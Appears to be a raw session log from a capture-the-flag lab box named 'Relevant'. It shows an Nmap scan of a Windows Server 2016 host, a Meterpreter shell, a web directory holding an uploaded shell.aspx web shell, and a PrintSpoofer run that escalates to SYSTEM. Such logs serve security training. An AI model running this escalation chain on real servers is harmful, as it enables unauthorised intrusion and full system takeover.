Nmap scan report for 10.10.102.75
Host is up (0.19s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2024-02-29T06:52:09+00:00
|_ssl-date: 2024-02-29T06:52:50+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2024-02-28T06:42:21
|_Not valid after:  2024-08-29T06:42:21
49663/tcp open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-02-28T22:52:12-08:00
| smb2-time:
|   date: 2024-02-29T06:52:10
|_  start_date: 2024-02-29T06:42:37
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h35m59s, deviation: 3h34m41s, median: -1s
meterpreter > shell
Process 1556 created.
Channel 2 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\Users\Bob\Desktop>cd c:/inetpub/wwwroot/nt4wrksv
cd c:/inetpub/wwwroot/nt4wrksv

c:\inetpub\wwwroot\nt4wrksv>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AC3C-5CB5

 Directory of c:\inetpub\wwwroot\nt4wrksv

02/29/2024  06:44 AM    <DIR>          .
02/29/2024  06:44 AM    <DIR>          ..
07/25/2020  07:15 AM                98 passwords.txt
02/29/2024  06:44 AM            27,136 PrintSpoofer64.exe
02/29/2024  06:34 AM         1,014,999 shell.aspx
               3 File(s)      1,042,233 bytes
               2 Dir(s)  21,043,695,616 bytes free

c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer64.exe -i -c powershell.exe
PrintSpoofer64.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
Privilege escalation succeeded.
PS C:\Windows\system32> whoami
whoami
nt authority\system